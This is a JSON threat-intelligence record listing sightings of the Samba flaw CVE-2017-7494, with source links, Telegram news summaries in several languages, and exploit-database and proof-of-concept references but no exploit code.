{"vulnerability": "CVE-2017-7494", "sightings": [{"uuid": "bc71993e-1f1b-4255-87ed-6ca5180916c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "seen", "source": "MISP/59708668-1bac-48d4-a03f-481a95ca48b7", "content": "", "creation_timestamp": "2017-07-20T10:31:07.000000Z"}, {"uuid": "718ff2e0-0663-448d-8aa4-ea2709dae25c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "seen", "source": "MISP/11082d0b-6105-454f-9dad-a68ec6945c56", "content": "", "creation_timestamp": "2020-10-09T13:36:32.000000Z"}, {"uuid": "991bea4d-824f-46e5-a362-1a7999040c95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "seen", "source": "MISP/6aff7139-f67b-433d-8b55-5935b1b16332", "content": "", "creation_timestamp": "2020-10-09T17:13:11.000000Z"}, {"uuid": "b57fb61e-c85c-41b6-8818-2199cdcb726e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "seen", "source": "MISP/9d9cf955-fe1b-4928-a358-a80623ac74ef", "content": "", "creation_timestamp": "2020-10-09T17:05:08.000000Z"}, {"uuid": "75f43bce-58d8-4ed0-a180-2373e3393bdc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2023-06-14T21:10:03.000000Z"}, {"uuid": "9bb477f9-b7d5-46a7-9703-3d49df16611e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "exploited", "source": "https://www.exploit-db.com/exploits/42084", "content": "", "creation_timestamp": "2017-05-29T00:00:00.000000Z"}, {"uuid": "e9310a19-7405-405c-bc3c-df7b70a3d07e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "exploited", "source": "https://www.exploit-db.com/exploits/42060", "content": "", "creation_timestamp": "2017-05-24T00:00:00.000000Z"}, {"uuid": "a77971d6-5a4b-49b6-8c7a-301603c445fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2971788", "content": "", "creation_timestamp": "2024-12-24T20:34:05.427718Z"}, {"uuid": "ef6867ef-bc24-49b0-bfff-4d582f360f9a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:43.000000Z"}, {"uuid": "07ec649a-c660-41cb-a901-9dbe020fcf29", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2017-7494", "type": "seen", "source": "https://gist.github.com/zx0r/bcefa42ec1e60a0bc721a5c4175dab15", "content": "", "creation_timestamp": "2025-02-03T15:09:47.000000Z"}, {"uuid": "b1095281-8bc4-4b3c-989d-bafc11f775c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:09:59.000000Z"}, {"uuid": "c4cad2da-60bd-4110-9a84-c6be470336db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:16.000000Z"}, {"uuid": "1d91226c-2ab2-4f70-a87c-37b06dea9137", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2017-7494", "type": "seen", "source": "https://gist.github.com/calmhavoc/3dbb11b1a80bf778a45f411b07a7395c", "content": "", "creation_timestamp": "2025-06-23T18:27:28.000000Z"}, {"uuid": "a00f17fb-4aed-4546-9345-b2ee9acfcb55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "seen", "source": "https://gist.github.com/Darksidesfear/97c95439522b3c4dec1538398066aa8f", "content": "", "creation_timestamp": "2025-05-04T11:34:03.000000Z"}, {"uuid": "a4b9d6de-5a11-4871-b0ba-892dd8584184", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2017-7494", "type": "seen", "source": "https://gist.github.com/Darksidesfear/38c018e6fb7a2a84e08d472725ae3985", "content": "", "creation_timestamp": "2025-05-10T20:42:08.000000Z"}, {"uuid": "9831d201-4693-4608-a3bc-b9803b206fb5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2017-7494", "type": "seen", "source": "https://bsky.app/profile/bisk.sureis.sexy/post/3m5e63idyyc2j", "content": "", "creation_timestamp": "2025-11-11T12:44:43.809916Z"}, {"uuid": "25b24f50-5274-48e9-a35f-849ffae27a08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "seen", "source": "MISP/d17bd6ef-d68b-317b-ac33-cdbc44c5fc57", "content": "", "creation_timestamp": "2025-08-31T03:12:58.000000Z"}, {"uuid": "f8be2ccd-47e8-424e-b86f-5fbd08338537", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "seen", "source": "MISP/ab0b745f-bbd5-338e-8b92-97dd0c757e9d", "content": "", "creation_timestamp": "2025-08-31T03:01:26.000000Z"}, {"uuid": "d077f9a6-168b-49a7-8ab8-3e98c7833ede", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/samba/is_known_pipename.rb", "content": "", "creation_timestamp": "2018-05-29T15:50:33.000000Z"}, {"uuid": "4cdbf372-0e04-434b-8f14-54b597d29831", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2017-7494", "type": "seen", "source": "https://gist.github.com/sgouda0412/434456cbab7604dace3eaff07ce71d83", "content": "", "creation_timestamp": "2025-12-22T07:32:36.000000Z"}, {"uuid": "8e1d4153-521d-4055-8d06-43e155d615ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2017-7494", "type": "seen", "source": "https://gist.github.com/537/dbf3bc7a36df91ad3b633b4171b4d9c5", "content": "", "creation_timestamp": "2026-01-12T16:33:44.000000Z"}, {"uuid": "103b24f5-892a-4ca7-8a9c-14adca0fd496", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2017-7494", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/9f483b0e-3a88-4398-a949-9b4063af414c", "content": "", "creation_timestamp": "2026-02-02T12:27:02.485733Z"}, {"uuid": "5330ef02-deb8-4379-aca6-5dcedbdc9f64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "published-proof-of-concept", "source": "Telegram/01GGrWaIJhITxqdnZlJihka9NT9sVNTR5xWCmeIggv0SuXU", "content": "", "creation_timestamp": "2025-11-23T03:00:06.000000Z"}, {"uuid": "84c44e42-03aa-4c72-82c9-b837483470b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "seen", "source": "https://t.me/webamoozir/1877", "content": "\u0622\u0633\u06cc\u0628\u200c \u067e\u0630\u06cc\u0631\u06cc \u0647\u0641\u062a/\u06f7 \u0633\u0627\u0644\u0647 \u0646\u0631\u0645 \u0627\u0641\u0632\u0627\u0631 \u0634\u0628\u06a9\u0647 \u0627\u06cc \u0633\u0627\u0645\u0628\u0627\n@webamoozir\n\u06cc\u06a9 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc\u0650 \u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 \u062f\u0631 \u0646\u0631\u0645 \u0627\u0641\u0632\u0627\u0631 \u0634\u0628\u06a9\u0647 \u0627\u06cc \u0633\u0627\u0645\u0628\u0627 \u06cc\u0627\u0641\u062a \u0634\u062f\u0647 \u0627\u0633\u062a \u06a9\u0647 \u0647\u0641\u062a/7 \u0633\u0627\u0644 \u062f\u0631 \u0622\u0646 \u0646\u0631\u0645 \u0627\u0641\u0632\u0627\u0631 \u0628\u0648\u062f\u0647 \u0627\u0633\u062a \u0648 \u0628\u0647 \u0631\u062e\u0646\u0647 \u06af\u0631 \u0631\u0627\u0647 \u062f\u0648\u0631 \u0627\u0645\u06a9\u0627\u0646 \u0645\u06cc \u062f\u0647\u062f \u06a9\u0647 \u0645\u062f\u06cc\u0631\u06cc\u062a \u062f\u0633\u062a\u06af\u0627\u0647 \u0644\u06cc\u0646\u0648\u06a9\u0633\u06cc\u0650 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631 \u0631\u0627 \u062f\u0631 \u062f\u0633\u062a \u0628\u06af\u06cc\u0631\u062f. \u0633\u0627\u0645\u0628\u0627\u060c \u0646\u0631\u0645 \u0627\u0641\u0632\u0627\u0631 \u0645\u062a\u0646 \u0628\u0627\u0632 \u0627\u0633\u062a \u0648 \u06a9\u0647 \u062f\u0648\u0628\u0627\u0631\u0647 \u0627\u0632 \u067e\u0631\u0648\u062a\u06a9\u0644 SMB \u067e\u06cc\u0627\u062f\u0647 \u0634\u062f\u0647 \u0627\u0633\u062a \u06a9\u0647 \u062f\u0631 \u0628\u06cc\u0634\u062a\u0631 \u0633\u06cc\u0633\u062a\u0645 \u0647\u0627\u06cc\u0639\u0627\u0645\u0644\u060c \u0648\u06cc\u0646\u062f\u0648\u0632\u060c \u0644\u06cc\u0646\u0648\u06a9\u0633\u060c \u06cc\u0648\u0646\u06cc\u06a9\u0633\u060c \u0633\u0627\u0645\u0627\u0646\u0647 \u0647\u0627\u06cc \u0622\u06cc \u0628\u06cc \u0627\u0645 \u0648 OpenVMS \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc \u0634\u0648\u062f. \u0646\u0631\u0645 \u0627\u0641\u0632\u0627\u0631 \u0633\u0627\u0645\u0628\u0627 \u0628\u0647 \u0633\u06cc\u0633\u062a\u0645 \u0647\u0627\u06cc\u0639\u0627\u0645\u0644 \u063a\u06cc\u0631-\u0648\u06cc\u0646\u062f\u0648\u0632\u06cc \u0647\u0645 \u0627\u062c\u0627\u0632\u0647 \u0645\u06cc \u062f\u0647\u062f \u062a\u0627 \u067e\u0631\u0648\u0646\u062f\u0647 \u0647\u0627\u060c \u067e\u0648\u0634\u0647 \u0647\u0627 \u0648 \u0686\u0627\u067e\u06af\u0631\u0647\u0627 \u0631\u0627 \u0628\u0627 \u0633\u06cc\u0633\u062a\u0645 \u0647\u0627\u06cc\u0639\u0627\u0645\u0644 \u0648\u06cc\u0646\u062f\u0648\u0632 \u062f\u0631 \u0633\u0637\u062d \u0634\u0628\u06a9\u0647 \u0628\u0647 \u0627\u0634\u062a\u0631\u0627\u06a9 \u0628\u06af\u0630\u0627\u0631\u0646\u062f. \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u06a9\u0647 \u062a\u0627\u0632\u06af\u06cc \u06cc\u0627\u0641\u062a \u0634\u062f\u0647 \u0627\u0633\u062a\u060c \u0628\u0627 \u0634\u0646\u0627\u0633\u0647: CVE-2017-7494- \u0628\u0631 \u0646\u0633\u062e\u0647 \u0647\u0627\u06cc \u062a\u0627\u0632\u06c0 \u0633\u0627\u0645\u0628\u0627 - \u0627\u0632 \u06f3.\u06f5.\u06f0 \u0648 \u0628\u0627\u0644\u0627\u062a\u0631 - \u06a9\u0647 \u062f\u0631 \u06cc\u06a9\u0645/\u06f1 \u0645\u0627\u0631\u0633 \u0633\u0627\u0644 \u06f2\u06f0\u06f1\u06f0 \u0645\u0646\u062a\u0634\u0631 \u0634\u062f\u0647 \u0627\u0646\u062f\u060c \u062a\u0623\u062b\u06cc\u0631 \u0646\u0647\u0627\u062f\u0647 \u0627\u0633\u062a. \u0628\u0631\u0627\u0633\u0627\u0633 \u067e\u0648\u06cc\u0634 \u0647\u0627\u06cc\u06cc \u06a9\u0647 \u0628\u0627 \u0627\u0628\u0632\u0627\u0631 \u0634\u0648\u062f\u0627\u0646 \u0627\u0646\u062c\u0627\u0645 \u0634\u062f\u0647 \u0627\u0633\u062a\u060c \u0628\u06cc\u0634 \u0627\u0632 \u06f4\u06f8\u06f5 \u0647\u0632\u0627\u0631 \u062f\u0633\u062a\u06af\u0627\u0647 \u0628\u0627 \u062a\u0648\u0627\u0646\u0645\u0646\u062f\u06cc \u0633\u0627\u0645\u0628\u0627 \u0648 \u062f\u0631\u06af\u0627\u0647 \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 \u0622\u0646\u060c \u0628\u0627 \u0634\u0645\u0627\u0631\u0647: \u06f4\u06f4\u06f5 \u062f\u0631 \u0633\u0637\u062d \u0627\u06cc\u0646\u062a\u0631\u0646\u062a \u062f\u0631 \u062f\u0633\u062a\u0631\u0633 \u0647\u0645\u06af\u0627\u0646 \u0627\u0633\u062a. \u0628\u0647 \u06af\u0641\u062a\u0647 \u067e\u0698\u0648\u0647\u0634\u06af\u0631\u0627\u0646\u060c \u0631\u0648\u06cc \u06f1\u06f1\u06f0 \u0647\u0632\u0627\u0631 \u062f\u0633\u062a\u06af\u0627\u0647 \u0646\u06cc\u0632 \u0646\u0633\u062e\u0647 \u0647\u0627\u06cc\u06cc \u0627\u0632 \u0627\u06cc\u0646 \u0646\u0631\u0645 \u0627\u0641\u0632\u0627\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc \u0634\u0648\u062f \u06a9\u0647 \u0627\u0632 \u0622\u0646\u0647\u0627 \u067e\u0634\u062a\u06cc\u0628\u0627\u0646\u06cc \u0646\u0634\u062f\u0647 \u0627\u0633\u062a \u0648 \u0647\u06cc\u0686 \u0648\u0635\u0644\u0647 \u0627\u06cc \u0628\u0631\u0627\u06cc \u0622\u0646\u0647\u0627 \u0627\u0631\u0627\u0626\u0647 \u0646\u0645\u06cc \u0634\u0648\u062f. \u0628\u0627 \u062a\u0648\u062c\u0647 \u0628\u0647 \u0627\u06cc\u0646\u06a9\u0647 \u0633\u0627\u0645\u0628\u0627 \u0646\u0633\u062e\u0647 \u0627\u06cc \u0627\u0632 \u067e\u0631\u0648\u062a\u06a9\u0644 SMB \u0627\u0633\u062a \u06a9\u0647 \u0628\u0631\u0627\u06cc \u0645\u0627\u0634\u06cc\u0646 \u0647\u0627\u06cc \u0644\u06cc\u0646\u0648\u06a9\u0633 \u0648 \u06cc\u0648\u0646\u06cc\u06a9\u0633 \u067e\u06cc\u0627\u062f\u0647 \u0633\u0627\u0632\u06cc \u0634\u062f\u0647\u060c \u067e\u0698\u0648\u0647\u0634\u06af\u0631\u0627\u0646 \u0645\u06cc \u06af\u0648\u06cc\u0646\u062f \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0646\u0633\u062e\u0647 \u0644\u06cc\u0646\u0648\u06a9\u0633\u06cc \u0627\u0632 \u0627\u0628\u0632\u0627\u0631 EternalBlue \u0627\u0633\u062a \u06a9\u0647 \u0628\u0627\u062c \u0627\u0641\u0632\u0627\u0631 \u06af\u0631\u06cc\u0647 \u0627\u0632 \u0622\u0646 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f\u0647 \u0627\u0633\u062a.\n\n\u0645\u0646\u0628\u0639: http://thehackernews.com.", "creation_timestamp": "2017-05-28T11:58:53.000000Z"}, {"uuid": "554a5d82-41b2-4d89-b329-9c6f192ddd29", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "published-proof-of-concept", "source": "https://t.me/codeby_sec/659", "content": "https://codeby.net/forum/threads/root-exploit-samba-cve-2017-7494.59748/", "creation_timestamp": "2017-06-08T03:15:42.000000Z"}, {"uuid": "6c1ccbda-4fe8-4f31-9361-b436623b7832", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "exploited", "source": "https://t.me/poxek/666", "content": "\u0412\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u0430\u044f \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u00abEternal scilence\u00bb \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442 UPnP \u0438 \u043f\u0440\u0435\u0432\u0440\u0430\u0449\u0430\u0435\u0442 \u0440\u043e\u0443\u0442\u0435\u0440\u044b \u0432 \u043f\u0440\u043e\u043a\u0441\u0438 \u0434\u043b\u044f \u0441\u043e\u043a\u0440\u044b\u0442\u0438\u044f \u0434\u0440\u0443\u0433\u043e\u0439 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438.\n\nUPnP (universal plug and play) - \u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b, \u043e\u043f\u0446\u0438\u043e\u043d\u0430\u043b\u044c\u043d\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0439 \u0432 \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u0435 \u0441\u043e\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0445 \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u043e\u0432; \u043e\u043d \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0434\u0440\u0443\u0433\u0438\u043c \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u043c \u0432 \u0441\u0435\u0442\u0438 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0441\u043e\u0437\u0434\u0430\u0432\u0430\u0442\u044c \u043f\u0440\u0430\u0432\u0438\u043b\u0430 \u043f\u0440\u043e\u0431\u0440\u043e\u0441\u0430 \u043f\u043e\u0440\u0442\u043e\u0432, \u0447\u0442\u043e\u0431\u044b \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \u043c\u043e\u0433\u043b\u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0434\u0435\u0432\u0430\u0439\u0441\u0430\u043c \u0432\u043d\u0443\u0442\u0440\u0438 \u0441\u0435\u0442\u0438 \u043f\u043e \u043c\u0435\u0440\u0435 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0441\u0442\u0438. \u0422\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u044f, \u043e\u0434\u043d\u0430\u043a\u043e, \u0434\u0430\u043b\u0435\u043a\u043e \u043d\u0435 \u0441\u0442\u043e\u043b\u044c \u0436\u0435 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u0430, \u0441\u043a\u043e\u043b\u044c \u0443\u0434\u043e\u0431\u043d\u0430: \u0437\u0430 \u0432\u0440\u0435\u043c\u044f \u0435\u0435 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043e\u0432\u0430\u043d\u0438\u044f \u0432 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u0438\u043c\u043f\u043b\u0435\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u044f\u0445 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u043b\u0438\u0441\u044c \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442\u0441\u044f \u0432 \u0445\u043e\u0434\u0435 \u0434\u0430\u043d\u043d\u043e\u0439 \u0430\u0442\u0430\u043a\u0438, \u043d\u0430\u0437\u0432\u0430\u043d\u043d\u043e\u0439 Akamai (\u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c\u0438, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0448\u0438\u043c\u0438 \u0435\u0435) \u00abUPnProxy\u00bb.\n\n\u0415\u0441\u043b\u0438 \u0432\u0435\u0440\u0438\u0442\u044c \u0434\u043e\u043a\u043b\u0430\u0434\u0443, 277,000 \u0438\u0437 3,500,000 \u0440\u043e\u0443\u0442\u0435\u0440\u043e\u0432 \u0441 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u043e\u0439 \u0434\u0430\u043d\u043d\u043e\u0439 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u044b \u0434\u043b\u044f \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0445, \u0438 45,113 \u0443\u0436\u0435 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u044b. \u0410\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 EternalBlue (CVE-2017-0144) \u0438 EternalRed (CVE-2017-7494) \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f RCE \u043d\u0430 \u043d\u0435\u043f\u0440\u043e\u043f\u0430\u0442\u0447\u0435\u043d\u043d\u044b\u0445 windows \u0438 Linux \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 \u0441\u043e\u043e\u0442\u0432\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e. \u0414\u0430\u043b\u0435\u0435 \u0441\u043e\u0437\u0434\u0430\u044e\u0442\u0441\u044f \u043f\u0440\u0430\u0432\u0438\u043b\u0430 \u0434\u043b\u044f \u043f\u0440\u043e\u0431\u0440\u043e\u0441\u0430 \u043f\u043e\u0440\u0442\u043e\u0432 \u0441 \u0437\u0430\u0431\u0430\u0432\u043d\u043e\u0439 \u0444\u0440\u0430\u0437\u043e\u0439 - \u00abgalleta silenciosa\u00bb (\u0442\u0438\u0445\u0430\u044f \u043f\u0435\u0447\u0435\u043d\u044c\u043a\u0430 \u0432 \u043f\u0435\u0440\u0435\u0432\u043e\u0434\u0435 \u0441 \u0438\u0441\u043f\u0430\u043d\u0441\u043a\u043e\u0433\u043e).\n\nAkamai \u0442\u0430\u043a\u0436\u0435 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u0438\u043b\u0438 bash-\u0441\u043a\u0440\u0438\u043f\u0442, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u0439 \u043e\u0447\u0438\u0441\u0442\u0438\u0442\u044c \u0443\u0436\u0435 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u044b\u0435 \u0434\u0435\u0432\u0430\u0439\u0441\u044b.\n@NeKaspersky", "creation_timestamp": "2022-02-01T13:08:16.000000Z"}, {"uuid": "b393124a-f173-4738-bfa4-03e5b67cc879", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "exploited", "source": "https://t.me/alexlitreev_channel/166", "content": "\u041d\u0435\u0434\u0430\u0432\u043d\u043e \u043f\u043e\u044f\u0432\u0438\u043b\u0430\u0441\u044c Linux-\u0432\u0435\u0440\u0441\u0438\u044f \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u0430 EternalBlue. \u0418\u043c\u0435\u043d\u043d\u043e \u0435\u0433\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b \n\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043b\u044c\u0449\u0438\u043a WannaCry.\n\n\u041a\u0430\u043a \u0437\u0430\u0449\u0438\u0442\u0438\u0442\u044c \u0441\u0435\u0431\u044f \u2014 \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0435: https://www.samba.org/samba/security/CVE-2017-7494.html", "creation_timestamp": "2017-05-28T09:07:39.000000Z"}, {"uuid": "15d3c0a5-fc5c-49f6-9ff8-9c3712d8dc4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "published-proof-of-concept", "source": "https://t.me/R0_Crew/72", "content": "Samba 3.5.0 - Remote Code Execution Exploit\n\nEDB-ID: 42060\nDate: 05/24/2017\nExploit Author: steelo \nVendor Homepage: https://www.samba.org\nSamba 3.5.0 - 4.5.4/4.5.10/4.4.14\nCVE-2017-7494\n\nSee exploit at Vulners", "creation_timestamp": "2017-05-25T23:05:12.000000Z"}, {"uuid": "2088bd44-dc82-4c36-b01b-900389c51ba9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "published-proof-of-concept", "source": "Telegram/iimLBgfveRJNPn8n15oXMCE3voNQwpoaxofI1bBvnb3-u_k", "content": "", "creation_timestamp": "2023-03-23T21:11:10.000000Z"}, {"uuid": "7f05e0cd-7e51-416b-bfb7-4d59e0bb1f4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "seen", "source": "https://t.me/arpsyndicate/1107", "content": "#ExploitObserverAlert\n\nCVE-2017-7494\n\nDESCRIPTION: Exploit Observer has 273 entries related to CVE-2017-7494. Samba since version 3.5.0 and before 4.6.4, 4.5.10 and 4.4.14 is vulnerable to remote code execution vulnerability, allowing a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it.\n\nFIRST-EPSS: 0.972640000\nNVD-IS: 5.9\nNVD-ES: 3.9", "creation_timestamp": "2023-12-04T03:54:54.000000Z"}, {"uuid": "b2f08216-9424-426a-9770-c294e48be5f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "seen", "source": "https://t.me/arpsyndicate/110", "content": "#ExploitObserverAlert\n\nCVE-2017-7494\n\nDESCRIPTION: Exploit Observer has 265 entries related to CVE-2017-7494. Samba since version 3.5.0 and before 4.6.4, 4.5.10 and 4.4.14 is vulnerable to remote code execution vulnerability, allowing a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it.\n\nFIRST-EPSS: 0.972640000\nNVD-IS: 5.9\nNVD-ES: 3.9", "creation_timestamp": 